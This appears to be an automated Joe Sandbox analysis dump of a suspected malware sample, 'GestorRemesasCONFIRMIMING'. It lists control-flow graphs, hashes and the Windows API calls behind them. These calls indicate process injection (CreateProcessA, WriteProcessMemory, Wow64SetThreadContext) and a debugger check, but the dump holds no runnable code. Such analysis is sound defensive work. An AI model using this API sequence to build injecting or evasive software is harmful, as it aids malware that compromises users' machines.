                                                  control_flow_graph 103 6a479c8-6a47a5d 105 6a47a96-6a47ab6 103->105 106 6a47a5f-6a47a69 103->106 113 6a47aef-6a47b1e 105->113 114 6a47ab8-6a47ac2 105->114 106->105 107 6a47a6b-6a47a6d 106->107 108 6a47a90-6a47a93 107->108 109 6a47a6f-6a47a79 107->109 108->105 111 6a47a7d-6a47a8c 109->111 112 6a47a7b 109->112 111->111 115 6a47a8e 111->115 112->111 120 6a47b57-6a47c11 CreateProcessA 113->120 121 6a47b20-6a47b2a 113->121 114->113 116 6a47ac4-6a47ac6 114->116 115->108 118 6a47ac8-6a47ad2 116->118 119 6a47ae9-6a47aec 116->119 122 6a47ad4 118->122 123 6a47ad6-6a47ae5 118->123 119->113 134 6a47c13-6a47c19 120->134 135 6a47c1a-6a47ca0 120->135 121->120 125 6a47b2c-6a47b2e 121->125 122->123 123->123 124 6a47ae7 123->124 124->119 126 6a47b30-6a47b3a 125->126 127 6a47b51-6a47b54 125->127 129 6a47b3c 126->129 130 6a47b3e-6a47b4d 126->130 127->120 129->130 130->130 132 6a47b4f 130->132 132->127 134->135 145 6a47cb0-6a47cb4 135->145 146 6a47ca2-6a47ca6 135->146 147 6a47cc4-6a47cc8 145->147 148 6a47cb6-6a47cba 145->148 146->145 149 6a47ca8 146->149 151 6a47cd8-6a47cdc 147->151 152 6a47cca-6a47cce 147->152 148->147 150 6a47cbc 148->150 149->145 150->147 154 6a47cee-6a47cf5 151->154 155 6a47cde-6a47ce4 151->155 152->151 153 6a47cd0 152->153 153->151 156 6a47cf7-6a47d06 154->156 157 6a47d0c 154->157 155->154 156->157 158 6a47d0d 157->158 158->158
                                                  APIs
                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06A47BFE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2131344151.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6a40000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID: px]/$px]/
                                                  • API String ID: 963392458-2092919866
                                                  • Opcode ID: 4410357562d363256155004e0fe04e4ef3c79f2fa795188d8980b3d9474ee1b9
                                                  • Instruction ID: 302a5d6026378d03fa6c075082f215e3bf5623325856d7a456bb13715a2a76a5
                                                  • Opcode Fuzzy Hash: 4410357562d363256155004e0fe04e4ef3c79f2fa795188d8980b3d9474ee1b9
                                                  • Instruction Fuzzy Hash: 2B916C71D00259CFEB64EF68CC417AEBBB2FF84310F1485A9E809A7240DB749985CF91

                                                  Control-flow Graph

                                                  control_flow_graph 160 4b21ce5-4b21d56 161 4b21d61-4b21d68 160->161 162 4b21d58-4b21d5e 160->162 163 4b21d73-4b21dab 161->163 164 4b21d6a-4b21d70 161->164 162->161 165 4b21db3-4b21e12 CreateWindowExW 163->165 164->163 166 4b21e14-4b21e1a 165->166 167 4b21e1b-4b21e53 165->167 166->167 171 4b21e60 167->171 172 4b21e55-4b21e58 167->172 173 4b21e61 171->173 172->171 173->173
                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04B21E02
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2129060307.0000000004B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_4b20000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID: CreateWindow
                                                  • String ID: px]/$px]/
                                                  • API String ID: 716092398-2092919866
                                                  • Opcode ID: fa4618118b0e7ea399f448bec44360029401966fa2849abac51ba8827ca72fbd
                                                  • Instruction ID: 62abb507b7fb52f751e9ae80b861e2d0cab06288fac3ff849dd6872a8c222061
                                                  • Opcode Fuzzy Hash: fa4618118b0e7ea399f448bec44360029401966fa2849abac51ba8827ca72fbd
                                                  • Instruction Fuzzy Hash: E951CFB1D003599FDB14CF99D984ADEBFB5FF48310F24866AE818AB210D770A845CF90

                                                  Control-flow Graph

                                                  control_flow_graph 174 4b21cf0-4b21d56 175 4b21d61-4b21d68 174->175 176 4b21d58-4b21d5e 174->176 177 4b21d73-4b21e12 CreateWindowExW 175->177 178 4b21d6a-4b21d70 175->178 176->175 180 4b21e14-4b21e1a 177->180 181 4b21e1b-4b21e53 177->181 178->177 180->181 185 4b21e60 181->185 186 4b21e55-4b21e58 181->186 187 4b21e61 185->187 186->185 187->187
                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04B21E02
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2129060307.0000000004B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_4b20000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID: CreateWindow
                                                  • String ID: px]/$px]/
                                                  • API String ID: 716092398-2092919866
                                                  • Opcode ID: 820d56c3f1127984cc22243d4c6246ad0a64d1d49f3f9a69676c534fd12850bf
                                                  • Instruction ID: d51f760b4b618da9109a382bb026ce283a3ed95ed096a8a4068d5bc855ecf6dd
                                                  • Opcode Fuzzy Hash: 820d56c3f1127984cc22243d4c6246ad0a64d1d49f3f9a69676c534fd12850bf
                                                  • Instruction Fuzzy Hash: 2841CEB1D00359DFDB14CF9AC984ADEBBB5FF48310F24866AE819AB210D774A845CF90

                                                  Control-flow Graph

                                                  control_flow_graph 231 bfae30-bfae3f 232 bfae6b-bfae6f 231->232 233 bfae41-bfae4e call bf9838 231->233 234 bfae83-bfaec4 232->234 235 bfae71-bfae7b 232->235 240 bfae64 233->240 241 bfae50 233->241 242 bfaec6-bfaece 234->242 243 bfaed1-bfaedf 234->243 235->234 240->232 286 bfae56 call bfb0b8 241->286 287 bfae56 call bfb0c8 241->287 242->243 245 bfaf03-bfaf05 243->245 246 bfaee1-bfaee6 243->246 244 bfae5c-bfae5e 244->240 247 bfafa0-bfb060 244->247 248 bfaf08-bfaf0f 245->248 249 bfaee8-bfaeef call bfa814 246->249 250 bfaef1 246->250 281 bfb068-bfb093 GetModuleHandleW 247->281 282 bfb062-bfb065 247->282 252 bfaf1c-bfaf23 248->252 253 bfaf11-bfaf19 248->253 251 bfaef3-bfaf01 249->251 250->251 251->248 255 bfaf25-bfaf2d 252->255 256 bfaf30-bfaf39 call bfa824 252->256 253->252 255->256 262 bfaf3b-bfaf43 256->262 263 bfaf46-bfaf4b 256->263 262->263 264 bfaf4d-bfaf54 263->264 265 bfaf69-bfaf6d 263->265 264->265 267 bfaf56-bfaf66 call bfa834 call bfa844 264->267 268 bfaf73-bfaf76 265->268 267->265 271 bfaf99-bfaf9f 268->271 272 bfaf78-bfaf96 268->272 272->271 283 bfb09c-bfb0b0 281->283 284 bfb095-bfb09b 281->284 282->281 284->283 286->244 287->244
                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 00BFB086
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2122753782.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_bf0000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID: px]/
                                                  • API String ID: 4139908857-3026016296
                                                  • Opcode ID: 8ee0a65b832029fb23e4e22c65bd60eed51843dc09c014b274972da0a9dd20bf
                                                  • Instruction ID: ce65d8f4d07006ad59254b2a705d61a6ac554a71e676f04c91234cea4404ff49
                                                  • Opcode Fuzzy Hash: 8ee0a65b832029fb23e4e22c65bd60eed51843dc09c014b274972da0a9dd20bf
                                                  • Instruction Fuzzy Hash: A77159B0A00B098FD728DF29D44176ABBF1FF88700F10896DE55ADBA50DB74E949CB91

                                                  Control-flow Graph

                                                  control_flow_graph 288 4b20bfc-4b242fc 291 4b24302-4b24307 288->291 292 4b243ac-4b243cc call 4b20ad4 288->292 294 4b2435a-4b24392 CallWindowProcW 291->294 295 4b24309-4b24340 291->295 299 4b243cf-4b243dc 292->299 297 4b24394-4b2439a 294->297 298 4b2439b-4b243aa 294->298 302 4b24342-4b24348 295->302 303 4b24349-4b24358 295->303 297->298 298->299 302->303 303->299
                                                  APIs
                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 04B24381
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2129060307.0000000004B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_4b20000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID: CallProcWindow
                                                  • String ID: px]/
                                                  • API String ID: 2714655100-3026016296
                                                  • Opcode ID: e4cf840eb95c977c2c044fcddc7962d86772a92f07791e28c14745c943066a0a
                                                  • Instruction ID: ac0904117cccc369a49157a9c89ccbb1a8059e6763971217b574dbb95e348128
                                                  • Opcode Fuzzy Hash: e4cf840eb95c977c2c044fcddc7962d86772a92f07791e28c14745c943066a0a
                                                  • Instruction Fuzzy Hash: 554136B5A002199FDB04CF99C588AABBBF5FF88314F248498D519AB320D774A841CBA0

                                                  Control-flow Graph

                                                  control_flow_graph 305 bf449c-bf59d9 CreateActCtxA 309 bf59db-bf59e1 305->309 310 bf59e2-bf5a3c 305->310 309->310 317 bf5a3e-bf5a41 310->317 318 bf5a4b-bf5a4f 310->318 317->318 319 bf5a51-bf5a5d 318->319 320 bf5a60 318->320 319->320 321 bf5a61 320->321 321->321
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 00BF59C9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2122753782.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_bf0000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID: px]/
                                                  • API String ID: 2289755597-3026016296
                                                  • Opcode ID: d5f9a8a37ef3ea68a03f66607628c9d81c139a8e36f4f01f983c123ae2fa8be1
                                                  • Instruction ID: e1a95054c27f7205b16ab0614271df2424c28cc6940ea00f57638fdb0e9f88f3
                                                  • Opcode Fuzzy Hash: d5f9a8a37ef3ea68a03f66607628c9d81c139a8e36f4f01f983c123ae2fa8be1
                                                  • Instruction Fuzzy Hash: F141C271C0071DCBDB24CFA9C98479EBBF5BF48704F2481AAD508AB251DBB56949CF90

                                                  Control-flow Graph

                                                  control_flow_graph 323 bf590c-bf598c 325 bf598f-bf59d9 CreateActCtxA 323->325 327 bf59db-bf59e1 325->327 328 bf59e2-bf5a3c 325->328 327->328 335 bf5a3e-bf5a41 328->335 336 bf5a4b-bf5a4f 328->336 335->336 337 bf5a51-bf5a5d 336->337 338 bf5a60 336->338 337->338 339 bf5a61 338->339 339->339
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 00BF59C9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2122753782.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_bf0000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID: px]/
                                                  • API String ID: 2289755597-3026016296
                                                  • Opcode ID: be87400e57c0391ad6b8b78a77ee9197cb5e536da6ceca14099b78c23525a745
                                                  • Instruction ID: cb9f4c3ac3e312622dddfd07dd9a09cc19c4f6b26e2e5d64ba70a6629dc85416
                                                  • Opcode Fuzzy Hash: be87400e57c0391ad6b8b78a77ee9197cb5e536da6ceca14099b78c23525a745
                                                  • Instruction Fuzzy Hash: BD41C1B1C0071DCBEB24CFA9C98479DBBF5BF48304F2481AAD508AB251DB756949CF90

                                                  Control-flow Graph

                                                  control_flow_graph 341 6a47428-6a4742d 342 6a4742f-6a47487 341->342 343 6a4741b-6a47427 341->343 345 6a4748e-6a474bd ReadProcessMemory 342->345 343->341 346 6a474c6-6a474f6 345->346 347 6a474bf-6a474c5 345->347 347->346
                                                  APIs
                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06A474B0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2131344151.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6a40000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessRead
                                                  • String ID: px]/
                                                  • API String ID: 1726664587-3026016296
                                                  • Opcode ID: c4944014f19aa8d0e705d8f0aafd0b75b02ec3355aa013155e541917f43b5af7
                                                  • Instruction ID: 85c165ebffa665e76a0acf8bd47329226765ec439b87a7d0e49fe36fb1476fcc
                                                  • Opcode Fuzzy Hash: c4944014f19aa8d0e705d8f0aafd0b75b02ec3355aa013155e541917f43b5af7
                                                  • Instruction Fuzzy Hash: F0212771C013499FDB50DFA9C885AEEBFF4FF88320F14842AE559A7240D7789941CBA5

                                                  Control-flow Graph

                                                  control_flow_graph 351 6a47338-6a4738e 353 6a47390-6a4739c 351->353 354 6a4739e-6a473dd WriteProcessMemory 351->354 353->354 356 6a473e6-6a47416 354->356 357 6a473df-6a473e5 354->357 357->356
                                                  APIs
                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06A473D0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2131344151.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6a40000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessWrite
                                                  • String ID: px]/
                                                  • API String ID: 3559483778-3026016296
                                                  • Opcode ID: c6a230660a00fa122b6944ebd69161190c21a927223a968ff3ecb4f19b1d8a4c
                                                  • Instruction ID: 250258d8ee23c0c24f9d9a8c8da075cc6bbf68ed61c171ed39b81fd52d9e6490
                                                  • Opcode Fuzzy Hash: c6a230660a00fa122b6944ebd69161190c21a927223a968ff3ecb4f19b1d8a4c
                                                  • Instruction Fuzzy Hash: 5F2126769003499FDF10DFA9C981BDEBBF1FF88310F10842AE919A7240C7789951CBA0

                                                  Control-flow Graph

                                                  control_flow_graph 361 6a46d68-6a46d6d 362 6a46d6f-6a46dbb 361->362 363 6a46d5b-6a46d5d 361->363 365 6a46dbd-6a46dc9 362->365 366 6a46dcb-6a46dfb Wow64SetThreadContext 362->366 365->366 368 6a46e04-6a46e34 366->368 369 6a46dfd-6a46e03 366->369 369->368
                                                  APIs
                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06A46DEE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2131344151.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6a40000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID: ContextThreadWow64
                                                  • String ID: px]/
                                                  • API String ID: 983334009-3026016296
                                                  • Opcode ID: 43ea39a3f0d88b0a99cb8d2c768124daa71b698cfc0b91753c86b91822a39f11
                                                  • Instruction ID: e29d14f03cfe65bb36bb22fdb6a80f5c102ad55506ee8b438809aabcb8a34ff4
                                                  • Opcode Fuzzy Hash: 43ea39a3f0d88b0a99cb8d2c768124daa71b698cfc0b91753c86b91822a39f11
                                                  • Instruction Fuzzy Hash: AD213C71D00309CFDB50DFAAC8857EEBBF4EF88324F14842AD519A7240D7789945CB95
                                                  APIs
                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06A473D0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2131344151.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6a40000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessWrite
                                                  • String ID: px]/
                                                  • API String ID: 3559483778-3026016296
                                                  • Opcode ID: 54fa77aa17aff6ac991256fa0a796d5efa3dede0af07fa0b3ae62ccab9e00aaf
                                                  • Instruction ID: e4a64b6a8b323700cd9bc78296408f5cbcba02128c2843ea86bb97d167b00e8c
                                                  • Opcode Fuzzy Hash: 54fa77aa17aff6ac991256fa0a796d5efa3dede0af07fa0b3ae62ccab9e00aaf
                                                  • Instruction Fuzzy Hash: 7721F6729003499FDB50DFA9C885BDEBBF5FF88310F108429E919A7240D778A954CBA5
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00BFD387
                                                  Strings
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5336587bdf92b0474be2b29e82110db679680c5366c908399b15fa9bb0fce6d2
                                                  • Instruction ID: 7faaf61b869fa3e890213b06a821c116018b43f9d3b1a11c9f88ab44e2d15b28
                                                  • Opcode Fuzzy Hash: 5336587bdf92b0474be2b29e82110db679680c5366c908399b15fa9bb0fce6d2
                                                  • Instruction Fuzzy Hash: 75E10D74E001598FDB14EF99C990AAEFBB2FF89304F248259D414AB355D771AD42CFA0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2131344151.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6a40000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fe462f235b369b374e3b95360daa7e69976d254e0b4c8494c81f9499a0d7565a
                                                  • Instruction ID: 5814f8acf7d2700bcc4a2627b75efb1d12967e8436f28ffaeffbe29619cbd561
                                                  • Opcode Fuzzy Hash: fe462f235b369b374e3b95360daa7e69976d254e0b4c8494c81f9499a0d7565a
                                                  • Instruction Fuzzy Hash: B9E1FE74E002598FDB14EFA9C990AAEFBF2FF89304F249259D414AB355D7309942CFA1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2131344151.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6a40000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3deb2dcdaf1b5c0038cc42bf13f0a86f9e00b135091a1c7d9745676d18cbc2c5
                                                  • Instruction ID: 2ebe17d9b11778e3e37445bf859f404129855da70dc6b7431679cabe131c3bc0
                                                  • Opcode Fuzzy Hash: 3deb2dcdaf1b5c0038cc42bf13f0a86f9e00b135091a1c7d9745676d18cbc2c5
                                                  • Instruction Fuzzy Hash: E0E1FC74E002598FDB54EF99C980AAEFBF2FF89304F248259D414AB355D730A942CFA1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2131344151.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6a40000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f5c4f44d623a9c1634b11ad2f7b8f5a63f32c50f7b123ac8ec9ae2630867b0bf
                                                  • Instruction ID: 611769381617147d7ca2304f1360c4a4b4d291594e43b63d000fa39a2072395a
                                                  • Opcode Fuzzy Hash: f5c4f44d623a9c1634b11ad2f7b8f5a63f32c50f7b123ac8ec9ae2630867b0bf
                                                  • Instruction Fuzzy Hash: EAE10E74E001598FDB54EF99C980AAEFBF2FF89305F248269D414AB355D730A942CFA0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2122753782.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_bf0000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e228914285365f9e8e5e680c1d4ad87b372d150942d30e2a886ef125c34ee4bf
                                                  • Instruction ID: 89ef447d4baa5eefbc8d1a6c25f5e73f890bb85d3cdbc69e822430ee8986300b
                                                  • Opcode Fuzzy Hash: e228914285365f9e8e5e680c1d4ad87b372d150942d30e2a886ef125c34ee4bf
                                                  • Instruction Fuzzy Hash: 5DA15136A002198FCF05DFB5C8405EEB7F2FF85300B1585BAEA05AB265DB75E959CB80
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2129060307.0000000004B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_4b20000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 97fc77289036c52c5caa9d55d3e37725f5255d4208ddc3677d889f6d158cbba6
                                                  • Instruction ID: cbe617197b6a33e5d25f22e02c71dfd45dfc80fed3967f6cb50af5a66823229b
                                                  • Opcode Fuzzy Hash: 97fc77289036c52c5caa9d55d3e37725f5255d4208ddc3677d889f6d158cbba6
                                                  • Instruction Fuzzy Hash: 3DD1C3B0901B46CAD711EF65FE583CD7BB1BBCA324B558209D2616B2F1DBB4144ACF84
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2131344151.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6a40000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6fc9489ecccf222b1bb1d49f41fc0d194842b606a186c5d3dec4bf94e07ec160
                                                  • Instruction ID: 1bbb1115257d5e1a0685f6945c5162908dca8e689aca4ac442ce97bf09edc946
                                                  • Opcode Fuzzy Hash: 6fc9489ecccf222b1bb1d49f41fc0d194842b606a186c5d3dec4bf94e07ec160
                                                  • Instruction Fuzzy Hash: 7551FD74E042598FDB14DFAAC9406AEFBF2FF89304F248269D418AB355D7319942CFA1

                                                  Execution Graph

                                                  Execution Coverage:11.5%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:3.6%
                                                  Total number of Nodes:84
                                                  Total number of Limit Nodes:11
                                                  execution_graph 37543 2947ec0 37544 2947f04 CheckRemoteDebuggerPresent 37543->37544 37545 2947f46 37544->37545 37531 68f3f28 DuplicateHandle 37532 68f3fbe 37531->37532 37546 294f228 37547 294f245 37546->37547 37548 294f26d 37546->37548 37552 294f2d4 37548->37552 37557 294f310 37548->37557 37549 294f28a 37554 294f2e5 37552->37554 37553 294f2f3 37553->37549 37554->37553 37555 294f356 GlobalMemoryStatusEx 37554->37555 37556 294f386 37555->37556 37556->37549 37558 294f356 GlobalMemoryStatusEx 37557->37558 37559 294f386 37558->37559 37559->37549 37560 2940848 37562 294084e 37560->37562 37561 294091b 37562->37561 37565 68f2fc8 37562->37565 37569 68f2fd8 37562->37569 37566 68f2fd8 37565->37566 37573 68f2bc8 37566->37573 37570 68f2fe7 37569->37570 37571 68f2bc8 2 API calls 37570->37571 37572 68f3008 37571->37572 37572->37562 37574 68f2bd3 37573->37574 37577 68f3b84 37574->37577 37576 68f458e 37578 68f3b8f 37577->37578 37579 68f4cb4 37578->37579 37581 68f6940 37578->37581 37579->37576 37582 68f6961 37581->37582 37583 68f6985 37582->37583 37585 68f6af0 37582->37585 37583->37579 37586 68f6afd 37585->37586 37587 68f6b36 37586->37587 37589 68f55d4 37586->37589 37587->37583 37590 68f55df 37589->37590 37592 68f6ba8 37590->37592 37593 68f5608 37590->37593 37592->37592 37594 68f5613 37593->37594 37600 68f5618 37594->37600 37596 68f6c17 37604 68fc0a0 37596->37604 37609 68fc0b8 37596->37609 37597 68f6c51 37597->37592 37603 68f5623 37600->37603 37601 68f8018 37601->37596 37602 68f6940 2 API calls 37602->37601 37603->37601 37603->37602 37605 68fc0b8 37604->37605 37606 68fc0f5 37605->37606 37615 68fc320 37605->37615 37619 68fc330 37605->37619 37606->37597 37611 68fc135 37609->37611 37612 68fc0e9 37609->37612 37610 68fc0f5 37610->37597 37611->37597 37612->37610 37613 68fc320 2 API calls 37612->37613 37614 68fc330 2 API calls 37612->37614 37613->37611 37614->37611 37616 68fc330 37615->37616 37622 68fc370 37616->37622 37617 68fc33a 37617->37606 37621 68fc370 2 API calls 37619->37621 37620 68fc33a 37620->37606 37621->37620 37623 68fc375 37622->37623 37624 68fc3b4 37623->37624 37628 68fc60a LoadLibraryExW 37623->37628 37629 68fc618 LoadLibraryExW 37623->37629 37624->37617 37625 68fc5b8 GetModuleHandleW 37627 68fc5e5 37625->37627 37626 68fc3ac 37626->37624 37626->37625 37627->37617 37628->37626 37629->37626 37533 68f3ce0 37534 68f3d26 GetCurrentProcess 37533->37534 37536 68f3d78 GetCurrentThread 37534->37536 37537 68f3d71 37534->37537 37538 68f3dae 37536->37538 37539 68f3db5 GetCurrentProcess 37536->37539 37537->37536 37538->37539 37540 68f3deb 37539->37540 37541 68f3e13 GetCurrentThreadId 37540->37541 37542 68f3e44 37541->37542 37630 68fe550 37631 68fe5b8 CreateWindowExW 37630->37631 37633 68fe674 37631->37633

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 758 2947ec0-2947f44 CheckRemoteDebuggerPresent 760 2947f46-2947f4c 758->760 761 2947f4d-2947f88 758->761 760->761
                                                  APIs
                                                  • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 02947F37
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4537442491.0000000002940000.00000040.00000800.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_2940000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID: CheckDebuggerPresentRemote
                                                  • String ID:
                                                  • API String ID: 3662101638-0
                                                  • Opcode ID: 7e69bb071ba6547d4a7bbaa600cc853f96e10183ab8f528c5bc375aca5abba04
                                                  • Instruction ID: 1eeab209e32c2fe49a02173779012a552d421383c32a732ec117cf290792aa8e
                                                  • Opcode Fuzzy Hash: 7e69bb071ba6547d4a7bbaa600cc853f96e10183ab8f528c5bc375aca5abba04
                                                  • Instruction Fuzzy Hash: 8A2128B1801259CFDB10CF9AD484BEEFBF4AF49224F14846AE559A3250D778A944CF61
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 068abbfac31d65b0ea6c352aee2551a592e9b1efdabc0ab3e9a86d0212c5ec83
                                                  • Instruction ID: 360c9f7a77301cc642d8486a05918441c08cb44ded518850e43ee7a165316044
                                                  • Opcode Fuzzy Hash: 068abbfac31d65b0ea6c352aee2551a592e9b1efdabc0ab3e9a86d0212c5ec83
                                                  • Instruction Fuzzy Hash: 65925930A00209CFDB64EB68C584A5DB7F6FB45314F6488AAD419EF7A1DB75ED81CB80
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f1619c6a30321948c3d6d4b4902a9d898bd5ca4f99a273028e33c7689b2f7d14
                                                  • Instruction ID: 2651f12396bac23ee3080a26f5df02c1690463c475a93ecec1969759dd9ce22e
                                                  • Opcode Fuzzy Hash: f1619c6a30321948c3d6d4b4902a9d898bd5ca4f99a273028e33c7689b2f7d14
                                                  • Instruction Fuzzy Hash: 86629B30F002098FDB54EB68D594AADB7F6EF88314F248569E406EB795DB35ED42CB80
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c010d1efc148878a61a2dd9b5ec466c36b6fc7fcec465e56aca8d3710c243bd8
                                                  • Instruction ID: 9188823c7a4a2ce204aaa853aea80b92ef6824a166888663f1406f99a44dc15d
